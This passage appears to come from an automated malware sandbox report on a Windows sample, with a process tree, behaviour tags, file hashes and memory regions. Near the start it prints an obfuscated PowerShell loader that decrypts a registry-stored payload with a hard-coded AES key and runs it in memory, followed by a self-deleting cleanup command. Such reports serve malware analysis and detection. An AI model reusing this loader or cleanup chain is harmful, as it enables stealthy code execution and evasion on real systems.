'').('gnirtSteG'[-1..-9] -join '')($LRYKC);$oSnpH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nSzPWxfvLItLrY6odHpw1Q==');$oSnpH = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($oSnpH, 0, $oSnpH.Length);$oSnpH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($oSnpH);$AarSr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2IqKtZxS/FqcdHbBUDZbWg==');$AarSr = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AarSr, 0, $AarSr.Length);$AarSr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AarSr);$jKHVk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bw7IB5l0nDJz4V/yoKrAmg==');$jKHVk = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jKHVk, 0, $jKHVk.Length);$jKHVk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jKHVk);$BvkGZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AF0yFBzJZFVK0sW/C+0yOA==');$BvkGZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BvkGZ, 0, $BvkGZ.Length);$BvkGZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BvkGZ);$KJTnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IzMxK6yRkvNAq3b86ckOZw==');$KJTnP = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KJTnP, 0, $KJTnP.Length);$KJTnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KJTnP);$TjsNY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XQk0rQ8HHWmKAJLDXLuouQ==');$TjsNY0 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY0, 0, $TjsNY0.Length);$TjsNY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY0);$TjsNY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('owtqeXTsnLcs3cgKbzagCA==');$TjsNY1 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY1, 0, $TjsNY1.Length);$TjsNY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY1);$TjsNY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2RVrgdRC9/qmCG1cuVpcPg==');$TjsNY2 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY2, 0, $TjsNY2.Length);$TjsNY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY2);$TjsNY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bl9qQJYdA2YNQzYMsVAcjg==');$TjsNY3 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY3, 0, $TjsNY3.Length);$TjsNY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY3);$qGrKR.Dispose();$pdyuP1.Dispose();$TSIUN = [Microsoft.Win32.Registry]::$BvkGZ.$jKHVk($TjsNY).$AarSr($qvqLZ);$yZizz=[string[]]$TSIUN.Split('\');$yPDZH=FCxri(pxzLS([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[1])));OSlRe $yPDZH (,[string[]] ('%*'));$QEiEV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[0]);$pdyuP = New-Object System.Security.Cryptography.AesManaged;$pdyuP.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$FYZzj = $pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')();$QEiEV = $FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QEiEV, 0, $QEiEV.Length);$FYZzj.Dispose();$pdyuP.Dispose();$NTbes = New-Object System.IO.MemoryStream(, $QEiEV);$DmFpj = New-Object System.IO.MemoryStream;$FsdiJ = New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::$TjsNY1);$FsdiJ.$KJTnP($DmFpj);$FsdiJ.Dispose();$NTbes.Dispose();$DmFpj.Dispose();$QEiEV = $DmFpj.ToArray();$soNjb = $LRYKC | IEX;$HlzxU = $soNjb::$TjsNY2($QEiEV);$rrXdx = $HlzxU.EntryPoint;$rrXdx.$TjsNY0($null, (, [string[]] ($FNruO)))
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Hide Artifacts: Hidden Window
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:3932
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"
                                                                                                  4⤵
                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                  PID:5092
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    5⤵
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:2368
                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                    PING localhost -n 8
                                                                                                    5⤵
                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                    • Runs ping.exe
                                                                                                    PID:5420
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"
                                                                                                    5⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:6108
                                                                                                  • C:\Windows\system32\attrib.exe
                                                                                                    ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"
                                                                                                    5⤵
                                                                                                    • Views/modifies file attributes
                                                                                                    PID:4940
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                            1⤵
                                                                                              PID:3548
                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                              1⤵
                                                                                                PID:3732
                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:3896
                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:3864
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                    1⤵
                                                                                                      PID:4976
                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                      1⤵
                                                                                                        PID:1000
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                        1⤵
                                                                                                          PID:1980
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                          1⤵
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          PID:4780
                                                                                                        • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                          "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                          1⤵
                                                                                                          • Drops file in System32 directory
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          PID:2212
                                                                                                        • C:\Windows\system32\SppExtComObj.exe
                                                                                                          C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:3408
                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                            C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                            1⤵
                                                                                                              PID:384
                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                              1⤵
                                                                                                                PID:3596
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                1⤵
                                                                                                                  PID:3948
                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:3144
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                    1⤵
                                                                                                                      PID:4488
                                                                                                                    • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                      C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                      1⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                      • Enumerates system info in registry
                                                                                                                      PID:4388
                                                                                                                    • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                      C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                      1⤵
                                                                                                                        PID:4428
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                        1⤵
                                                                                                                          PID:4132
                                                                                                                        • C:\Windows\System32\mousocoreworker.exe
                                                                                                                          C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                          1⤵
                                                                                                                            PID:2548
                                                                                                                          • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                            C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                            1⤵
                                                                                                                              PID:5844

                                                                                                                            Network

                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                            Replay Monitor

                                                                                                                            Loading Replay Monitor...

                                                                                                                            Downloads

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe

                                                                                                                              Filesize

                                                                                                                              442KB

                                                                                                                              MD5

                                                                                                                              04029e121a0cfa5991749937dd22a1d9

                                                                                                                              SHA1

                                                                                                                              f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                                                                              SHA256

                                                                                                                              9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                                                                              SHA512

                                                                                                                              6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gkd1c2qx.gpj.ps1

                                                                                                                              Filesize

                                                                                                                              60B

                                                                                                                              MD5

                                                                                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                              SHA1

                                                                                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                              SHA256

                                                                                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                              SHA512

                                                                                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                            • C:\Windows\System32\ucrtbased.dll

                                                                                                                              Filesize

                                                                                                                              1.8MB

                                                                                                                              MD5

                                                                                                                              7873612dddd9152d70d892427bc45ef0

                                                                                                                              SHA1

                                                                                                                              ab9079a43a784471ca31c4f0a34b698d99334dfa

                                                                                                                              SHA256

                                                                                                                              203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf

                                                                                                                              SHA512

                                                                                                                              d988e9ff11017465b019cf3b599ef7597d2c44fc37cbee9e846dee51990ca5dc45942cc183d9d25c1dfd84f33f922c2ceead6efc1ead19e8eecb509dfb78a083

                                                                                                                            • C:\Windows\System32\vcruntime140_1d.dll

                                                                                                                              Filesize

                                                                                                                              52KB

                                                                                                                              MD5

                                                                                                                              9ef28981adcbf4360de5f11b8f4ecff9

                                                                                                                              SHA1

                                                                                                                              219aaa1a617b1dfa36f3928bd1020e410666134f

                                                                                                                              SHA256

                                                                                                                              8caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a

                                                                                                                              SHA512

                                                                                                                              ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c

                                                                                                                            • C:\Windows\System32\vcruntime140d.dll

                                                                                                                              Filesize

                                                                                                                              162KB

                                                                                                                              MD5

                                                                                                                              a366d6623c14c377c682d6b5451575e6

                                                                                                                              SHA1

                                                                                                                              a8894fcfb3aa06ad073b1f581b2e749b54827971

                                                                                                                              SHA256

                                                                                                                              7ed89c668d8ec04c1a0a73f35702b8e0d9819e13e6e7c51c4ac0e0abda6683e6

                                                                                                                              SHA512

                                                                                                                              cc7da40652209337d2122cafc903d3c11e31b5a37baf2247034e2f3e1de255e58d0e27fc134ce60a6812e6674fd8bc899f2b434dfc1160053f684cf220e6cb11

                                                                                                                            • memory/316-208-0x00007FFD133F0000-0x00007FFD13400000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/316-207-0x00000276228C0000-0x00000276228E7000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              156KB

                                                                                                                            • memory/508-214-0x000001D6E9380000-0x000001D6E93A7000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              156KB

                                                                                                                            • memory/508-215-0x00007FFD133F0000-0x00007FFD13400000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/612-199-0x00007FFD133F0000-0x00007FFD13400000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/612-197-0x000001C8A40E0000-0x000001C8A4101000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              132KB

                                                                                                                            • memory/612-198-0x000001C8A4110000-0x000001C8A4137000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              156KB

                                                                                                                            • memory/668-203-0x00007FFD133F0000-0x00007FFD13400000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/668-202-0x000001B990470000-0x000001B990497000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              156KB

                                                                                                                            • memory/952-219-0x00007FFD133F0000-0x00007FFD13400000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/952-218-0x000002BB13EA0000-0x000002BB13EC7000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              156KB

                                                                                                                            • memory/956-211-0x000001FD0DBD0000-0x000001FD0DBF7000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              156KB

                                                                                                                            • memory/956-212-0x00007FFD133F0000-0x00007FFD13400000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/1064-226-0x00007FFD133F0000-0x00007FFD13400000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/1064-225-0x000001F290460000-0x000001F290487000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              156KB

                                                                                                                            • memory/1084-228-0x0000019393660000-0x0000019393687000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              156KB

                                                                                                                            • memory/1084-229-0x00007FFD133F0000-0x00007FFD13400000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/1176-232-0x00007FFD133F0000-0x00007FFD13400000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/1176-231-0x00000245DDA90000-0x00000245DDAB7000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              156KB

                                                                                                                            • memory/1208-235-0x00007FFD133F0000-0x00007FFD13400000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              64KB

                                                                                                                            • memory/1208-234-0x000002191C090000-0x000002191C0B7000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              156KB

                                                                                                                            • memory/1244-238-0x000001AAE1F40000-0x000001AAE1F67000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              156KB

                                                                                                                            • memory/1520-178-0x0000023C47220000-0x0000023C4724E000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              184KB

                                                                                                                            • memory/1520-45-0x00007FFD347A3000-0x00007FFD347A5000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              8KB

                                                                                                                            • memory/1520-167-0x0000023C47380000-0x0000023C47432000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              712KB

                                                                                                                            • memory/1520-168-0x0000023C47610000-0x0000023C477D2000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              1.8MB

                                                                                                                            • memory/1520-179-0x00007FFD53370000-0x00007FFD53565000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              2.0MB

                                                                                                                            • memory/1520-63-0x00007FFD53370000-0x00007FFD53565000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              2.0MB

                                                                                                                            • memory/1520-491-0x00007FFD347A0000-0x00007FFD35261000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/1520-486-0x00007FFD347A3000-0x00007FFD347A5000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              8KB

                                                                                                                            • memory/1520-485-0x00007FFD347A0000-0x00007FFD35261000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/1520-166-0x0000023C47270000-0x0000023C472C0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              320KB

                                                                                                                            • memory/1520-64-0x00007FFD51610000-0x00007FFD516CE000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              760KB

                                                                                                                            • memory/1520-60-0x00007FFD51610000-0x00007FFD516CE000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              760KB

                                                                                                                            • memory/1520-59-0x00007FFD53370000-0x00007FFD53565000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              2.0MB

                                                                                                                            • memory/1520-58-0x0000023C45AC0000-0x0000023C4637E000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              8.7MB

                                                                                                                            • memory/1520-57-0x0000023C45660000-0x0000023C45AC0000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              4.4MB

                                                                                                                            • memory/1520-56-0x00007FFD347A0000-0x00007FFD35261000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/1520-51-0x00007FFD347A0000-0x00007FFD35261000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/2420-18-0x00007FFD347A3000-0x00007FFD347A5000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              8KB

                                                                                                                            • memory/2420-22-0x00000194F5790000-0x00000194F5B20000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              3.6MB

                                                                                                                            • memory/2420-14-0x00000194E9FE0000-0x00000194EA002000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              136KB

                                                                                                                            • memory/2420-28-0x00007FFD53370000-0x00007FFD53565000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              2.0MB

                                                                                                                            • memory/2420-27-0x00000194D1D80000-0x00000194D1D8A000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              40KB

                                                                                                                            • memory/2420-26-0x00007FFD51610000-0x00007FFD516CE000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              760KB

                                                                                                                            • memory/2420-24-0x00007FFD53370000-0x00007FFD53565000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              2.0MB

                                                                                                                            • memory/2420-25-0x00007FFD347A0000-0x00007FFD35261000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/2420-23-0x00000194F5B20000-0x00000194F5B78000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              352KB

                                                                                                                            • memory/2420-4-0x00007FFD347A3000-0x00007FFD347A5000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              8KB

                                                                                                                            • memory/2420-20-0x00000194F4650000-0x00000194F5794000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              17.3MB

                                                                                                                            • memory/2420-1029-0x00007FFD347A0000-0x00007FFD35261000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/2420-19-0x00007FFD347A0000-0x00007FFD35261000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/2420-17-0x00000194D1D70000-0x00000194D1D7A000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              40KB

                                                                                                                            • memory/2420-16-0x00007FFD347A0000-0x00007FFD35261000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/2420-15-0x00007FFD347A0000-0x00007FFD35261000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              10.8MB

                                                                                                                            • memory/3936-30-0x0000000140000000-0x0000000140004000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              16KB

                                                                                                                            • memory/3936-32-0x0000000140000000-0x0000000140004000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              16KB

                                                                                                                            • memory/4900-184-0x00007FFD51610000-0x00007FFD516CE000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              760KB

                                                                                                                            • memory/4900-182-0x0000000140000000-0x0000000140029000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              164KB

                                                                                                                            • memory/4900-183-0x00007FFD53370000-0x00007FFD53565000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              2.0MB

                                                                                                                            • memory/4900-181-0x0000000140000000-0x0000000140029000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              164KB

                                                                                                                            • memory/4900-194-0x0000000140000000-0x0000000140029000-memory.dmp

                                                                                                                              Filesize

                                                                                                                              164KB